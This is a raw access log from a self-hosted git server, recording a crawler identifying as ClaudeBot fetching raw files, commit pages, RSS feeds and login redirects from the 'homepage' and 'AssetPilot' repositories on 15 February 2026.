[Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:29:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/logs/letsencrypt.log.6" [Client 216.73.216.188] [Length 42638] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:29:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/logs/letsencrypt.log.7" [Client 216.73.216.188] [Length 9843] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:29:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/logs/letsencrypt.log.4" [Client 216.73.216.188] [Length 9845] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:29:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/logs/letsencrypt.log.7" [Client 216.73.216.188] [Length 940] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:29:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/logs/letsencrypt.log.4" [Client 216.73.216.188] [Length 940] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:29:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/README.md" [Client 216.73.216.188] [Length 553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:29:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/calculator.py" [Client 216.73.216.188] [Length 1922] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:29:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/calculator.py" [Client 216.73.216.188] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:29:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/types.ts" [Client 216.73.216.188] [Length 9880] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:29:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/index.html" [Client 216.73.216.188] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:29:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/README.md?display=source" [Client 216.73.216.188] [Length 11790] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:30:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2F.Backup%2Fhtml%2Findex.html" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:30:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2F.Backup%2Fhtml%2Fstatus.json" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:30:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/calculator.py?display=rendered" [Client 216.73.216.188] [Length 10978] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:30:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/README.md?display=rendered" [Client 216.73.216.188] [Length 11362] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:30:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2F.Backup%2Fhtml%2Fpackage.json" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:30:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.6?display=rendered" [Client 216.73.216.188] [Length 11208] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:30:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/index.html" [Client 216.73.216.188] [Length 17807] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:30:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/status.json" [Client 216.73.216.188] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:30:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/logs/letsencrypt.log.6" [Client 216.73.216.188] [Length 9848] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:30:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Hero.tsx" [Client 216.73.216.188] [Length 13897] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:30:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/logs/letsencrypt.log.6" [Client 216.73.216.188] [Length 940] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:30:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Services.tsx" [Client 216.73.216.188] [Length 14689] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:30:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2Fhtml%2Fassets%2Fcss" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:30:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fnpm%2Fdata%2Flogs%2Fletsencrypt.log.4" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:30:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fnpm%2Fdata%2Flogs%2Fletsencrypt.log.7" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:30:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fnpm%2Fdata%2Flogs%2Fletsencrypt.log.6" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:30:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2Fhtml%2Fassets%2Fcss" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:30:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2F.Backup%2Fhtml%2FREADME.md" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:31:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2F.Backup%2Fhtml%2F.gitignore" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:31:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2Fhtml%2Fpages" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:31:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/.gitignore" [Client 216.73.216.188] [Length 253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:31:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/.gitignore" [Client 216.73.216.188] [Length 9861] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:31:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/.gitignore?display=rendered" [Client 216.73.216.188] [Length 10911] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:31:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/.gitignore?display=source" [Client 216.73.216.188] [Length 11514] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:31:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/metadata.json" [Client 216.73.216.188] [Length 238] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:31:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/css" [Client 216.73.216.188] [Length 10108] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:31:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/metadata.json?display=source" [Client 216.73.216.188] [Length 11316] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:31:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/services/geminiService.ts" [Client 216.73.216.188] [Length 13171] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:31:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/tsconfig.json" [Client 216.73.216.188] [Length 542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:31:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/metadata.json" [Client 216.73.216.188] [Length 9879] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:31:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/services" [Client 216.73.216.188] [Length 9883] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:31:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/tsconfig.json?display=source" [Client 216.73.216.188] [Length 11895] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:32:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/tsconfig.json" [Client 216.73.216.188] [Length 9878] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:32:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets" [Client 216.73.216.188] [Length 9867] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:32:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/App.tsx?display=source" [Client 216.73.216.188] [Length 12799] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:32:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/metadata.json?display=rendered" [Client 216.73.216.188] [Length 10907] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:32:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2F.Backup%2Fhtml%2Fservices" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:32:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2F.Backup%2Fhtml%2Fmetadata.json" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:32:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/tsconfig.json?display=rendered" [Client 216.73.216.188] [Length 10908] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:32:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images" [Client 216.73.216.188] [Length 10200] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:33:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2F.Backup%2Fhtml%2F.gitignore" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:33:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/App.tsx" [Client 216.73.216.188] [Length 1336] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:33:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/App.tsx" [Client 216.73.216.188] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:33:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/vite.config.ts?display=source" [Client 216.73.216.188] [Length 11977] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:33:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2F.Backup%2Fhtml%2Fassets" [Client 216.73.216.188] [Length 4854] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:33:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2F.Backup%2Fhtml%2Ftsconfig.json" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:33:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/App.tsx?display=rendered" [Client 216.73.216.188] [Length 10906] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:33:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/index.tsx?display=source" [Client 216.73.216.188] [Length 11666] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:33:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2F.Backup%2Fhtml%2FApp.tsx" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:33:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/index.tsx" [Client 216.73.216.188] [Length 351] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:33:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/vite.config.ts" [Client 216.73.216.188] [Length 580] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:33:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/vite.config.ts" [Client 216.73.216.188] [Length 9884] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:34:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2F.Backup%2Fhtml" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:34:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/index.tsx" [Client 216.73.216.188] [Length 9875] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:34:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/vite.config.ts?display=rendered" [Client 216.73.216.188] [Length 10907] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:34:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/.gitignore?display=source" [Client 216.73.216.188] [Length 11508] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:34:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr 